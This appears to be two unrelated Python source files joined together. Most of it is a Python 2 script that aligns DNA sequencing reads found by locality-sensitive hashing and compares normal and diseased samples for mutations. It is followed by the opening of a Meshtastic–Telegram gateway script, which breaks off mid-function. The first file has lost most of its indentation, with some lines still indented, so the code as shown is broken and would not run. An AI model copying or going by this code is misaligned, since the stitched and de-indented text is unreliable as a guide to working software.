#logprint(log, False, "counterRightGroups:\n", Counter(numRightPartGroups))
return p
def initMultiSeqAlign(normal, diseased, candPairs, pool, pool_size, log=None):
seqsNormal = getAllReads(normal, log)
global secondSample
secondSample = len(seqsNormal)
seqsDiseased = getAllReads(diseased, log)
seqs = seqsNormal + seqsDiseased
num = len(seqs)
#params = [(seqs, p, pool_size, num, log) for p in range(0, pool_size)]
#params = (seqs, pool_size, num, log)
#results = pool.map(multiSeqAlign, params)
    procs = []
    for b in xrange(pool_size):
        p = Process(target=multiSeqAlign,
                    args=(seqs, b, pool_size, num, candPairs, log, ))
        p.start()
        procs.append(p)
    # Wait for all worker processes, not just the last one started
    for p in procs:
        p.join()
#multiSeqAlign(params)
def alignLeftParts(read_R, seqs, alignedGroups, candidatePairs, log, r=None):
readROffset = len(seqs[read_R-1])
checkedLeftParts = set()
parts = candidatePairs[read_R]
for read_L in parts:
if read_L in checkedLeftParts:
continue
if read_L < secondSample:
m = M1 # set to 0 or M1
else:
m = M1
for alignInfo in findAlignment(read_R, read_L, seqs,
readROffset, m, log):
#offset += len(seqs[read_R-1])
offset, mis, lenCompared = alignInfo
global numreadL
numreadL += 1
#print offset
newGroup = True
for group in alignedGroups:
if fitsInGroup(group, seqs, read_R, read_L, alignInfo,
offset, M2):
# Add read_L to group
global c1
c1 += 1
if read_L < secondSample:
if read_L in group.leftPartsN:
group.leftPartsN[read_L].append(offset)
else:
group.leftPartsN[read_L] = [offset]
else:
if read_L in group.leftPartsD:
group.leftPartsD[read_L].append(offset)
else:
group.leftPartsD[read_L] = [offset]
# Fits in group, so don't create new group
newGroup = False
break
            # If read_L doesn't fit in any existing group, create a new one
if newGroup:
global c7
c7 += 1
group = AlignedGroup(read_R, readROffset, offset+readROffset)
# Start of extra part - offsetExtraPart
start = len(seqs[read_R]) - offset
#group.consensusRight = seqs[read_L][start:] + seqs[read_L+1]
# Add read_L to new the group
if read_L < secondSample:
group.leftPartsN[read_L] = [offset]
else:
group.leftPartsD[read_L] = [offset]
group.leftReadsOffset = offset+group.readROffset
group.mismatches = mis
# Add anchor point to consensus
for bp in ''.join((seqs[read_R-1], seqs[read_R])):
group.consensus.append({bp:1})
# Add overlapping part of read_L to consensus
seq_read_L = ''.join((seqs[read_L], seqs[read_L+1]))
for index in xrange(start):
i = index + group.readROffset + offset
bp = seq_read_L[index]
group.consensus[i][bp] = group.consensus[i].get(bp, 0) + 1
# print " "*offset, (seqs[read_L]+seqs[read_L+1])
# print " "*-offset, seqs[read_R]
# print offset
# Add the rest of read_L to consensus
for bp in seq_read_L[start:]:
group.consensus.append({bp:1})
# Append new group to the other groups
alignedGroups.append(group)
checkedLeftParts.add(read_L)
# TESTING - Second pass of left-parts
# for i in xrange(len(alignedGroups)):
# for read_L in alignedGroups[i].leftPartsN:
# for j in xrange(i+1, len(alignedGroups)):
# for offset in alignedGroups[i].leftPartsN[read_L]:
# if fitsInGroup(alignedGroups[j], seqs, read_R, read_L,
# None, offset - group.readROffset, M2):
# if read_L in group.leftPartsN:
# group.leftPartsN[read_L].append(offset)
# else:
# group.leftPartsN[read_L] = [offset]
# for read_L in alignedGroups[i].leftPartsD:
# for j in xrange(i+1, len(alignedGroups)):
# for offset in alignedGroups[i].leftPartsD[read_L]:
# if fitsInGroup(alignedGroups[j], seqs, read_R, read_L,
# None, offset - group.readROffset, M2):
# if read_L in group.leftPartsD:
# group.leftPartsD[read_L].append(offset)
# else:
# group.leftPartsD[read_L] = [offset]
def findAlignment(r_R, r_L, seqs, readROffset, m, log):
read_R = seqs[r_R]
read_L = seqs[r_L]
doPrint = False
offset = 0
alignments = 0
if len(read_R) > len(read_L):
offset = len(read_R) - len(read_L)
lengthToCompare = len(read_L)# - overlap*2
else:
lengthToCompare = len(read_R)# - overlap*2
overlapLength = lengthToCompare - overlap*2
# check for alignment by shifting read_L along read_R
while lengthToCompare > overlapLength:
mismatches = set()
# if log == 2119:
# print "", read_R
# print " "*offset, read_L
for i in xrange(lengthToCompare):
if read_R[i+offset] != read_L[i]:
global c3
c3 += 1
mismatches.add(i+offset+readROffset)
if len(mismatches) > m:
break
if len(mismatches) <= m:
if doPrint:
print "offset:", offset
print "", read_R
print " "*(offset-1), read_L
print mismatches
yield offset, mismatches, lengthToCompare
alignments += 1
if maxAlignments == alignments:
break
offset += 1
lengthToCompare -= 1
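# Editor's sketch (hypothetical call, never invoked): enumerate every offset
# at which the left part seqs[read_L] aligns under the anchor seqs[read_R]
# with at most M1 mismatches. The globals `overlap`, `maxAlignments` and `M1`
# are configured elsewhere in the original script.
def _example_enumerate_alignments(read_R, read_L, seqs):
    return [(off, sorted(mis)) for off, mis, _ in
            findAlignment(read_R, read_L, seqs, len(seqs[read_R - 1]),
                          M1, None)]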
def fitsInGroup(group, seqs, read_R, read_L, alignInfo, offset, m2):
global c6
c6 += 1
lread_R = seqs[read_R]
lread_L = seqs[read_L]+seqs[read_L+1]
mismatches = 0
if alignInfo:
offset2, mis, lenCompared = alignInfo
else:
lenCompared = len(lread_R) - offset
mis = set()
for i in xrange(lenCompared):
if lread_R[i+offset] != lread_L[i]:
mis.add(i+offset+group.readROffset)
offset += group.readROffset
mismatches = set()
seq_read_R = seqs[read_R-1]+seqs[read_R]
# lenToCompare = min(len(group.consensus)-offset, len(lread_L))
# for i in xrange(lenToCompare):
# if len(group.consensus[i+offset]) > 1 or \
# group.consensus[i+offset].keys()[0] != lread_L[i]:
# mismatches.add(i+offset)
lenToCompare = len(group.consensus)-len(seq_read_R)
readLLength = len(lread_L) - lenCompared
# if offset < 50:
# print
# print_fullConsensus([], group.consensus)
# print lenToCompare
# print readLLength
# print lenCompared
if readLLength < lenToCompare:
extraStart = lenToCompare - readLLength
lenToCompare = readLLength
# print extraStart
# print_fullConsensus([], group.consensus)
# print " "*offset, lread_L
for i in xrange(lenToCompare):
if len(group.consensus[i+len(seq_read_R)]) > 1 or \
group.consensus[i+len(seq_read_R)].keys()[0] != \
lread_L[i+lenCompared]:
mismatches.add(i+len(seq_read_R))
for m in group.mismatches:
mismatches.add(m)
for m in mis:
mismatches.add(m)
# if offset < 50:
# print " "*offset, (seqs[read_L]+seqs[read_L+1])
# print " "*-offset, seqs[read_R-1]+seqs[read_R]
# print offset
if len(mismatches) <= m2:
group.mismatches = mismatches
else:
return False
# Update consensus
lenToUpdate = min(len(group.consensus)-offset, len(lread_L))
for i in xrange(lenToUpdate):
group.consensus[i+offset][lread_L[i]] = \
group.consensus[i+offset].get(lread_L[i], 0) + 1
# Extend consensus to the right, if anything extra
extraPart = len(lread_L) - len(group.consensus) + offset
for i in xrange(extraPart):
group.consensus.append({lread_L[-(extraPart-i)]:1})
# if offset < 50:
# print " "*offset, (seqs[read_L]+seqs[read_L+1])
# print " "*-offset, seqs[read_R-1]+seqs[read_R]
# print offset
if group.leftReadsOffset > offset:
group.leftReadsOffset = offset
# print_fullConsensus([], group.consensus)
# print " "*offset, lread_L
# print offset
elif group.maxLeftReadsOffset < offset:
group.maxLeftReadsOffset = offset
# print newLeftReadsOffset
# print offset
# print
#group.mismatches = mismatches
return True
def alignRightParts_secondPass(group, seqs):
for pre_read_R in group.preRightParts:
for offset in group.preRightParts[pre_read_R]:
seq_pre_read_R = seqs[pre_read_R-1]+seqs[pre_read_R]
shallowGroup = getShallowGroup(group, pre_read_R,
seq_pre_read_R, offset, 0, 0, False)
if shallowGroup:
if pre_read_R in shallowGroup.preRightParts:
shallowGroup.preRightParts[pre_read_R].add(offset)
else:
shallowGroup.preRightParts[pre_read_R] = set([offset])
def createNewGroup(group, next_read_R, seq_next_read_R, offset, mismatches):
global c5
c5 += 1
newGroup = RightPartGroup(group.consensus)
if offset > 0:
j = offset
k = 0
else:
j = 0
k = -offset
# if next_read_R == 1805:
# print next_read_R
# print "LOL-NEW"
# print group.mismatches
# print newGroup.mismatches
# print mismatches
# print
# Update main-consensus
for i in xrange(len(seq_next_read_R)-k):
bp = seq_next_read_R[i+k]
newGroup.consensus[i+j][bp] = newGroup.consensus[i+j].get(bp, 0) + 1
# Update pre-consensus if any
for i in xrange(k):
bp = seq_next_read_R[i]
newGroup.preConsensus.append({bp:1})
global c2
c2 += 1
if next_read_R < secondSample:
#newGroup.rightPartsN[next_read_R] = set([offset])
newGroup.rightPartsN[next_read_R] = [offset]
else:
#newGroup.rightPartsD[next_read_R] = set([offset])
newGroup.rightPartsD[next_read_R] = [offset]
newGroup.mismatches = mismatches
if len(mismatches) > M2:
print mismatches
group.rightPartGroups.append(newGroup)
def addToGroup(group, rightPartGroup, seqs, read_R, next_read_R, offset, mismatches, m2):
global c4
c4 += 1
seq_next_read_R = seqs[next_read_R-1]+seqs[next_read_R]
seq_read_R = seqs[read_R-1]+seqs[read_R]
#all_mismatches = set([mis for mis in mismatches])
all_mismatches = copy.deepcopy(mismatches)
# Computes the length of the pre-consensus extension, if any
lenPreConsensus = len(rightPartGroup.preConsensus)
toExtend = -(lenPreConsensus + (group.readROffset -
len(seqs[next_read_R-1]) + offset))
if toExtend > 0:
"""
Case 1 - extending pre-consensus:
GAG TTATCATTGTGACTGGACAAAGTACG
GGAG TTATCATTGTGACTGGACAAA
"""
beginning = lenPreConsensus
j = 0
l = 0
elif offset > 0:
"""
Case 2 - no pre consensus access:
GAG TTATCATTGTGACTGGACAAAGTACG
TCATTGTGACTGGACAAA
"""
beginning = 0
j = offset
toExtend = 0
else: # offset <= 0
"""
Case 3 - touching pre-consensus:
GAG TTATCATTGTGACTGGACAAAGTACG
AG TTATCATTGTGACTGGACAAA
"""
# preconsensus already checked, start offset in read_k
beginning = -offset
# if read_k aligns in middle of consensus
j = 0
# Offset in preConsensus
l = lenPreConsensus+offset
# No extension
toExtend = 0
# Check consensus
# start = beginning + toExtend
# for i in xrange(group.leftReadsOffset-j):
# if seq_read_R[i+j] != seq_next_read_R[i+start]:
# all_mismatches.add(i+j)
# if len(all_mismatches) > m2:
# return True
# Check consensus
# start = beginning + toExtend
# for i in xrange(group.leftReadsOffset-j):
# if len(rightPartGroup.consensus[i+j]) > 1 or \
# rightPartGroup.consensus[i+j].iterkeys().next() \
# != seq_next_read_R[i+start]:
# all_mismatches.add(i+j)
# if len(all_mismatches) > m2:
# return False
# Check pre-consensus
for i in xrange(beginning):
if len(rightPartGroup.preConsensus[i+l]) > 1 or \
rightPartGroup.preConsensus[i+l].iterkeys().next() \
!= seq_next_read_R[i+toExtend]:
all_mismatches.add((i+l)-len(rightPartGroup.preConsensus))
global c3
c3 += 1
if len(all_mismatches) > m2:
# if next_read_R == 11035:
# print lenPreConsensus
# print "hej"
# print offset
# print toExtend
# print beginning
# print all_mismatches
# print_fullConsensus(rightPartGroup.preConsensus, rightPartGroup.consensus)
# print next_read_R
# createNewGroup(group, next_read_R, seq_next_read_R, offset,
# mismatches)
return False
# Add existing mismatches
# for mis in group.mismatches:
# all_mismatches.add(mis)
for mis in rightPartGroup.mismatches:
all_mismatches.add(mis)
if len(all_mismatches) > m2:
# createNewGroup(group, next_read_R, seq_next_read_R, offset,
# mismatches)
# global c3
# c3 += 1
# print read_R
# print next_read_R
# print " "*-offset,
# print_fullConsensus(rightPartGroup.preConsensus, rightPartGroup.consensus)
# print " "*offset, seq_next_read_R
# print offset
# print all_mismatches
# print rightPartGroup.mismatches
return False
# Update pre-consensus
for i in xrange(beginning):
bp = seq_next_read_R[i+toExtend]
rightPartGroup.preConsensus[i+l][bp] = \
rightPartGroup.preConsensus[i+l].get(bp, 0)+1
# Update main-consensus
start = beginning + toExtend
for i in xrange(len(seq_next_read_R)-start):
bp = seq_next_read_R[i+start]
rightPartGroup.consensus[i+j][bp] = \
rightPartGroup.consensus[i+j].get(bp, 0) + 1
# Extend pre-consensus if required
if toExtend > 0:
prePart = [{seq_next_read_R[i]:1} for i in xrange(toExtend)]
rightPartGroup.preConsensus = prePart + rightPartGroup.preConsensus
# Add read to group
global c2
c2 += 1
# if next_read_R == 3449:
# print next_read_R
# print "LOL"
# print group.mismatches
# print rightPartGroup.mismatches
# print
if next_read_R < secondSample:
if next_read_R in rightPartGroup.rightPartsN:
#rightPartGroup.rightPartsN[next_read_R].add(offset)
rightPartGroup.rightPartsN[next_read_R].append(offset)
else:
#rightPartGroup.rightPartsN[next_read_R] = set([offset])
rightPartGroup.rightPartsN[next_read_R] = [offset]
else:
if next_read_R in rightPartGroup.rightPartsD:
#rightPartGroup.rightPartsD[next_read_R].add(offset)
rightPartGroup.rightPartsD[next_read_R].append(offset)
else:
#rightPartGroup.rightPartsD[next_read_R] = set([offset])
rightPartGroup.rightPartsD[next_read_R] = [offset]
rightPartGroup.mismatches = all_mismatches
return True
def testRead(group, seqs, read_R, next_read_R, offset, m2, alignments, log):
seq_read_R = seqs[read_R-1]+seqs[read_R]
seq_next_read_R = seqs[next_read_R-1]+seqs[next_read_R]
# Check overlapping part
leftROffset = group.leftReadsOffset
lenToCompare = len(seq_next_read_R) - (leftROffset - offset)
mismatches = set([mis for mis in group.mismatches])
m1 = 0
m = M1 # set to 0 or M1
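    # m1 counts mismatches found while scanning this overlap (checked against m / M1 / M2
    # below); the accumulated group-wide mismatch set is separately capped at m2.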
for i in xrange(lenToCompare):
# if next_read_R == 1805:
# print "hejhej"
# print group.consensus[group.leftReadsOffset+i].keys()[0], seq_next_read_R[i+group.leftReadsOffset-offset]
# print group.leftReadsOffset+i
# print group.leftReadsOffset
# print lenToCompare
# print group.leftReadsOffset+i
# print group.leftReadsOffset-offset+i
# print group.consensus[i+group.leftReadsOffset].iterkeys().next()
# print seq_next_read_R[i+group.leftReadsOffset-offset]
if next_read_R < secondSample and (leftROffset+i) < len(seq_read_R):
if seq_read_R[i+leftROffset] != \
seq_next_read_R[i+leftROffset-offset]:
mismatches.add(leftROffset+i)
m1 += 1
if m1 > m:
return alignments
if len(group.consensus[leftROffset+i]) > 1 or \
group.consensus[leftROffset+i].iterkeys().next() \
!= seq_next_read_R[i+leftROffset-offset]:
mismatches.add(leftROffset+i)
global c3
c3 += 1
m1 += 1
# if next_read_R == 1805:
# #print " "*-offset,
# print_fullConsensus([], group.consensus)
# print " "*offset, seq_next_read_R
# print offset
# print "lololol"
# print group.consensus[group.leftReadsOffset+i].keys()[0], seq_next_read_R[i+group.leftReadsOffset-offset]
if leftROffset+i < len(seq_read_R):
if m1 > M1:
return alignments
else:
if m1 > M2:
return alignments
if len(mismatches) > m2:
return alignments
# print c3
# sys.exit()
# if next_read_R == 2097:
# print " "*-offset, seq_read_R
# print " "*offset, seq_next_read_R
# print read_R
# print next_read_R
# print mismatches
# print
# # print "Passed"
# print_fullConsensus([], group.consensus)
# print group.maxLeftReadsOffset
# print group.leftReadsOffset
# print offset
# Check rest against anchor
if offset > 0:
j = offset
k = 0
else:
j = 0
k = -offset
for i in xrange(leftROffset-j):
# if next_read_R == 2097:
# print seq_read_R[i+j], seq_next_read_R[i+k]
if seq_read_R[i+j] != seq_next_read_R[i+k]:
global c3
c3 += 1
mismatches.add(i+j)
if len(mismatches) > m2:
return alignments
added = False
# Check if it fits into existing groups
for rightPartGroup in group.rightPartGroups:
if addToGroup(group, rightPartGroup, seqs, read_R, next_read_R,
offset, mismatches, m2):
added = True
break
if not added:
createNewGroup(group, next_read_R, seq_next_read_R, offset,
mismatches)
return alignments + 1
def alignRightParts(read_R, seqs, alignedGroups, candidatePairs, log):
startOnePosOverlap = True
for group in alignedGroups:
group.checkedRightParts.add(read_R)
# TODO: Should probably be removed as valid groups might be removed
if len(group.leftPartsN)+len(group.leftPartsD) < 3:
global c8
c8 += 1
continue
for read_L in (group.leftPartsN.keys()+group.leftPartsD.keys()):
if len(candidatePairs[read_L]) > maxCandMates:
continue
parts = candidatePairs[read_L]
for next_read_R in parts:
if next_read_R not in group.checkedRightParts:
if startOnePosOverlap:
# m = M2
# if next_read_R < secondSample:
# if M2 > 0 and len(group.mismatches) < M2:
# m = M2-1
alignments = 0
seq_next_read_R = seqs[next_read_R-1] + \
seqs[next_read_R]
#st = group.maxLeftReadsOffset
# for offset in xrange(group.readROffset,
# st-len(seq_next_read_R), -1):
for offset in xrange(overlap, -overlap-1, -1):
# offset = 0
# for change in xrange(overlap*2+1):
# if change % 2 == 0:
# offset -= change
# else:
# offset += change
# print "st:", st
# print "r_offset:", group.readROffset
# print_leftGroup(group, read_R, seqs, log)
# print next_read_R
# print seq_next_read_R
# print offset
# print st-len(seq_next_read_R)
global numreadR
numreadR += 1
alignments = testRead(group, seqs, read_R,
next_read_R, offset, M2,
alignments, log)
group.checkedRightParts.add(next_read_R)
if alignments == maxAlignments:
break
else:
for alignInfo in findAlignment(next_read_R, read_L,
seqs, group.readROffset, 0, log):
for offset2 in (group.leftPartsN[read_L] +
group.leftPartsD[read_L]):
# global numreadR
# numreadR += 1
offset1, mis, lenCompared = alignInfo
offset = offset2 - offset1
offset += group.readROffset - \
len(seqs[next_read_R-1])
# mis = dismissRead(group, seqs, next_read_R,offset)
#
# if len(mis) > M2:
# group.checkedRightParts.add(next_read_R)
# continue
#
# added = False
# for rightPartGroup in group.rightPartGroups:
# added = fitsInGroup4(group, rightPartGroup,
# seqs, read_R, next_read_R, offset,
# mis, M2)
#
# # if not added:
# if len(group.rightPartGroups) == 0:
# seq_next_read_R = seqs[next_read_R-1]+seqs[next_read_R]
# createNewGroup(group, next_read_R,
# seq_next_read_R, offset, mis)
testRead(group, seqs, read_R, next_read_R,
offset, M2, alignments, log)
group.checkedRightParts.add(next_read_R)
# Second pass to add possible missing pre-right-parts to other groups
# alignRightParts_secondPass(group, seqs)
# for shallowGroup in group.shallowGroups:
# alignRightParts_secondPass(shallowGroup, seqs)
# GTCAA AGTTCAG
# TCAGAA TGCCC
# TTCAGAA TGCC
# 7 6 3 = 4
def newFindMutation(read_R, seqs, alignedGroups, log):
numUsefulGroups = 0
ancLen = len(seqs[read_R-1])+len(seqs[read_R])
misInOverlap = 0
for group in alignedGroups:
for rightPartGroup in group.rightPartGroups:
usefulMis = False
for mis in rightPartGroup.mismatches:
validPos = 0
if mis < 0:
for overlaps in rightPartGroup.preConsensus[mis].values():
if overlaps >= requiredOverlaps:
validPos += 1
else:
# if len(rightPartGroup.consensus[pos]) > 2:
# print_alignedGroup(group, rightPartGroup, read_R,
# seqs, log)
for overlaps in rightPartGroup.consensus[mis].values():
if overlaps >= requiredOverlaps:
validPos += 1
if validPos > 1:
usefulMis = True
if mis > group.leftReadsOffset and mis < ancLen:
misInOverlap += 1
if usefulMis and misInOverlap > 0:
print_alignedGroup(group, rightPartGroup, read_R,
seqs, log)
numUsefulGroups += 1
continue
return numUsefulGroups
def oldFindMutation(read_R, seqs, alignedGroups, log):
numUsefulGroups = 0
anchorLen = len(seqs[read_R-1])+len(seqs[read_R])
    if log is None:
log = open("usefulGroups/"+str(p_id)+".txt","w")
for group in alignedGroups:
for rightPartGroup in group.rightPartGroups:
# Check if groups contains enough information to analyze
numNormal = len(group.leftPartsN)+len(rightPartGroup.rightPartsN)
if numNormal+1 < requiredOverlaps:
continue
numDiseas = len(group.leftPartsD)+len(rightPartGroup.rightPartsD)
if numDiseas < requiredOverlaps:
continue
isUsefulGroup = False
for mis in rightPartGroup.mismatches:
if isUsefulGroup:
break
if mis < group.leftReadsOffset or mis > anchorLen-1:
continue
muts1 = findMutation(read_R, seqs, group.leftPartsN,
rightPartGroup.rightPartsN, mis, True, log)
muts2 = findMutation(read_R, seqs, group.leftPartsD,
rightPartGroup.rightPartsD, mis, False, log)
for mut1 in muts1:
for mut2 in muts2:
if mut1 != mut2 and not isUsefulGroup:
read = seqs[read_R]
print_compare(read, mis, mut1,
rightPartGroup.consensus, log)
isUsefulGroup = True
numUsefulGroups += 1
print_alignedGroup(group, rightPartGroup, read_R,
seqs, log)
return numUsefulGroups
def findMutation(read_R, seqs, leftparts, rightparts, mutationsPos, first, log):
# Test that the size of the group is big enough to infer any info
# if (len(leftparts)+len(rightparts)) < 3:
# return "Fail"
count = 0
validBPs = []
#for mutationsPos in mismatches:
# print "mutPos", mutationsPos
#firstSampleBP = set()
mutationBPsLeft = dict()
mutationBPsRight = dict()
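    # Count, for each candidate base at mutationsPos, how many left-part and
    # right-part reads support it; a base is only reported below if it appears on
    # both sides and its combined support reaches requiredOverlaps.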
# Get bp in anchor point
    if (first and read_R < secondSample) or \
       (not first and read_R > secondSample):
read = seqs[read_R-1]+seqs[read_R]
if mutationsPos > 0 and mutationsPos < len(read):
#firstSampleBP.add(read[mutationsPos])
bp = read[mutationsPos]
mutationBPsRight[bp] = mutationBPsRight.get(bp, 0) + 1
# Get bp in leftparts
for read_L in leftparts:
for offset in leftparts[read_L]:
offset += len(seqs[read_L])
if mutationsPos < offset:
continue
read = seqs[read_L]+seqs[read_L+1]
if mutationsPos > len(read)+offset-1:
continue
# print read[mutationsPos-offset-1]
# print read[mutationsPos-offset]
# print read[mutationsPos-offset+1]
count += 1
#firstSampleBP.add(read[mutationsPos-offset])
bp = read[mutationsPos-offset]
mutationBPsLeft[bp] = mutationBPsLeft.get(bp, 0) + 1
# Get bp in rightparts
for next_read_R in rightparts:
for offset in rightparts[next_read_R]:
if mutationsPos < offset:
continue
read = seqs[next_read_R-1]+seqs[next_read_R]
if mutationsPos > len(read)+offset-1:
continue
# print mutationsPos-offset
# print read[mutationsPos-offset-1]
# print read[mutationsPos-offset]
# print read[mutationsPos-offset+1]
# print mutationsPos
# print offset
# print read_R
# print read
# print len(read)
count += 1
#firstSampleBP.add(read[mutationsPos-offset])
bp = read[mutationsPos-offset]
mutationBPsRight[bp] = mutationBPsRight.get(bp, 0) + 1
for bp in mutationBPsRight:
overlapsLeft = mutationBPsLeft.get(bp, 0)
if overlapsLeft > 0:
if mutationBPsRight[bp]+overlapsLeft >= requiredOverlaps:
validBPs.append(bp)
return validBPs
# ************************************************************************** #
# #
# Sequence Align All Reads #
# #
# ************************************************************************** #
def seqAlignAllReads(fasta_file, log):
seqs = getAllReads(fasta_file, log)
numParts = len(seqs)/2
prog = 0
tim = time.clock()
for read_R in xrange(1,len(seqs),2):
alignedGroups = []
# Align left parts
alignLeft(read_R, seqs, alignedGroups, log)
# Align right parts
alignRight(read_R, seqs, alignedGroups, log)
# print_alignedGroups(alignedGroups, read_R, seqs, log)
# sys.exit()
prog += 1
if prog % 500 == 0:
logprint(log, False, "Processed", prog, "of", numParts,
"right parts in", (time.clock()-tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):",
memory_usage_resource())
global c1
logprint(log, False, "left parts aligned:", c1)
c1 = 0
global c2
logprint(log, True, "right parts aligned:", c2)
c2 = 0
logprint(log, False, "Finished sequence alignment",
(time.clock() - tim) / 60, "minutes")
logprint(log, True, "Memory usage (in mb):", memory_usage_resource())
logprint(log, False, "c1:", c1)
logprint(log, False, "c2:", c2)
logprint(log, False, "c3:", c3)
logprint(log, False, "c4:", c4)
logprint(log, False, "c5:", c5)
logprint(log, False, "c6:", c6)
logprint(log, False, "c7:", c7)
logprint(log, False, "numReadL:", numreadL)
logprint(log, False, "numReadR:", numreadR)
def alignLeft(read_R, seqs, alignedGroups, log):
readROffset = len(seqs[read_R-1])
for read_L in xrange(0,len(seqs),2):
#print seqs[read_R]
#print seqs[read_L]
for alignInfo in findAlignment(read_R, read_L, seqs,
readROffset, M1, log):
#offset += len(seqs[read_R-1])
offset, mis, lenCompared = alignInfo
global numreadL
numreadL += 1
#print offset
newGroup = True
for group in alignedGroups:
if fitsInGroup(group, seqs, read_R, read_L, alignInfo, offset, M2):
# Add read_L to group
global c1
c1 += 1
if read_L in group.leftParts:
group.leftParts[read_L].append(offset)
else:
group.leftParts[read_L] = [offset]
# Fits in group, so don't create new group
newGroup = False
break
# If read_L doesn't fit in any group, then create a new
if newGroup:
global c7
c7 += 1
group = AlignedGroup(read_R, readROffset, offset+readROffset)
# Start of extra part - offsetExtraPart
start = len(seqs[read_R]) - offset
#group.consensusRight = seqs[read_L][start:] + seqs[read_L+1]
                # Add read_L to the new group
group.leftParts[read_L] = [offset]
group.leftReadsOffset = offset+group.readROffset
group.mismatches = mis
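                # The consensus is a list with one entry per position; each entry maps
                # a base to the number of reads supporting that base at the position.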
# Add anchor point to consensus
for bp in ''.join((seqs[read_R-1], seqs[read_R])):
group.consensus.append({bp:1})
# Add overlapping part of read_L to consensus
for index in xrange(start):
i = index + group.readROffset + offset
bp = seqs[read_L][index]
group.consensus[i][bp] = group.consensus[i].get(bp, 0) + 1
# Add the rest of read_L to consensus
for bp in ''.join((seqs[read_L][start:], seqs[read_L+1])):
group.consensus.append({bp:1})
# Append new group to the other groups
alignedGroups.append(group)
def alignRight(read_R, seqs, alignedGroups, log):
for group in alignedGroups:
for read_L in group.leftParts:
for next_read_R in xrange(1,len(seqs),2):
if read_R != next_read_R and \
next_read_R not in group.checkedRightParts:
seq_next_read_R = seqs[next_read_R-1]+seqs[next_read_R]
st = group.maxLeftReadsOffset
for offset in xrange(st-len(seq_next_read_R)+10, st):
global numreadR
numreadR += 1
                        testRead(group, seqs, read_R, next_read_R,
                                 offset, M2, 0, log)
group.checkedRightParts.add(next_read_R)
# ************************************************************************** #
# #
# Main #
# #
# ************************************************************************** #
def main():
"""
Main method of the program
"""
totim = time.clock()
# s1 = "TACTCGCAATATCAAGCCTTATGGTTTATTCGTTCCTATGATCAGGATGA"
# s2 = "TCAAGCCTTATGGTTTATTCGTTCCTATGATCAGGATGATCATCAACTTC"
# print globalAlignment(s1, s2, 38, True)
# sys.exit()
# Parse command line options
fasta_file, normal_file, diseased_file, k, threshold, bands, rows, \
minhash_alg, seed, log_file, input_file, output_file, test \
= optionParse()
# For testing only
# input_file = "candidate_pairs_k_16_b_2_r_5_m_6.txt"
# n (number of hash functions = length of minhash signature) is given by
# n = bands * rows
with open(log_file, 'w') as log:
if input_file:
candidatePairs = importCandidatePairs(input_file, log)
else:
# candidatePairs = runLSH(fasta_file, bands, rows, n, k, seed,
# minhash_alg, log)
multiProcessing = False
if multiProcessing:
p_size = bands
# pool = Pool(processes=p_size)
pool = None
candidatePairs = runLSH(normal_file, diseased_file, bands,
rows, k, seed, minhash_alg, test, log,
multiProcessing, pool)
else:
candidatePairs = runLSH(normal_file, diseased_file, bands,
rows, k, seed, minhash_alg, test, log,
multiProcessing, None)
if output_file:
output = "candidate_pairs_k_"+str(k)+"_b_"+str(bands)+"_r_"+ \
str(rows)+"_m_"+str(minhash_alg)
exportCandidatePairs(candidatePairs, output_file, log)
if test == 0:
"""
Stop after the LSH step.
"""
print "Total time used:", time.clock() - totim / 60, "minutes"
sys.exit()
elif test == 1:
"""
Test S-curve distribution
"""
makeSPlot(normal_file, candidatePairs, k, bands, rows,
minhash_alg, log)
elif test == 2:
"""
Test which pairs are found by LSH
"""
pairsFoundByLSH(normal_file, diseased_file, candidatePairs, k,
bands, rows, log)
elif test == 3:
"""
Test different k values
"""
if fasta_file:
os.system("echo '"+str(k)+"\t"+str(candidatePairs[0])+"\t"+
str(candidatePairs[1])+"\t"+
str(candidatePairs[2])+"' >> "+fasta_file)
elif test == 4:
"""
Count number of candidate pairs satisfying the naive sim
"""
naiveSim = 0.97
total = 0
satisfying = 0
seqs = getAllReads(normal_file, log) + \
getAllReads(diseased_file, log)
for doc1 in candidatePairs:
for doc2 in candidatePairs[doc1]:
naive = globalAlignment(seqs[doc1],seqs[doc2], 32)
if naive >= naiveSim:
satisfying += 1
else:
logprint(log, False, seqs[doc1], "\n"+seqs[doc2],
"\n"+str(naive), "\n")
total += 1
logprint(log, False, "Satisfying naive sim:", satisfying)
logprint(log, False, "Total pairs:", total)
logprint(log, False, "Ratio:", float(satisfying)/total)
elif test == 5:
p_size = bands
# pool = Pool(processes=p_size)
pool = None
initMultiSeqAlign(normal_file, diseased_file, candidatePairs,
pool, p_size, log)
else:
            # If there is no LSH test to run, continue with constructing groups of aligned reads
#findMutations(candidatePairs, normal_file, diseased_file, log)
sequenceAlignment(candidatePairs, normal_file, diseased_file, log)
logprint(log, True, "Total time used:", (time.clock() - totim) / 60,
"minutes")
return (time.clock() - totim)
### For Testing ###
reads = getAllReads(fasta_file, log)
findSimPairs = False
if findSimPairs:
        findSimilarPairs(reads, candidatePairs, k, bands, rows,
minhash_alg, log)
else:
validateJaccardSim(reads, candidatePairs, k, bands, rows,
minhash_alg, log)
print "Total time used:", time.clock() - totim / 60, "minutes"
if __name__ == '__main__':
"""
Main method call
"""
main()
sys.exit(0)
|
mesh.py
|
#!/usr/bin/env python3
"""Meshtastic Telegram Gateway"""
#
import configparser
import logging
import sys
import time
#
from datetime import datetime, timedelta
from threading import Thread
from typing import (
AnyStr,
Dict,
List,
)
from urllib.parse import parse_qs
#
import aprslib
import flask
import haversine # type: ignore
import humanize # type: ignore
import telegram.ext
#
from flask import Flask, jsonify, make_response, request, render_template
from flask.views import View
from meshtastic import (
BROADCAST_ADDR as MESHTASTIC_BROADCAST_ADDR,
LOCAL_ADDR as MESHTASTIC_LOCAL_ADDR,
serial_interface as meshtastic_serial_interface,
portnums_pb2 as meshtastic_portnums_pb2
)
from pony.orm import db_session, Database, Optional, PrimaryKey, Required, Set, set_sql_debug
from pubsub import pub
from telegram import Update
from telegram.ext import CallbackContext
from telegram.ext import CommandHandler
from telegram.ext import Updater
from telegram.ext import MessageHandler, Filters
from werkzeug.serving import make_server
# has to be global variable ;-(
DB = Database()
with open('VERSION', 'r', encoding='utf-8') as fh:
VERSION = fh.read().rstrip('\n')
LOGFORMAT = '%(asctime)s - %(name)s/v{} - %(levelname)s file:%(filename)s %(funcName)s line:%(lineno)s %(message)s'
LOGFORMAT = LOGFORMAT.format(VERSION)
def get_lat_lon_distance(latlon1: tuple, latlon2: tuple) -> float:
"""
Get distance (in meters) between two geographical points using GPS coordinates
:param latlon1:
:param latlon2:
:return:
"""
if not isinstance(latlon1, tuple):
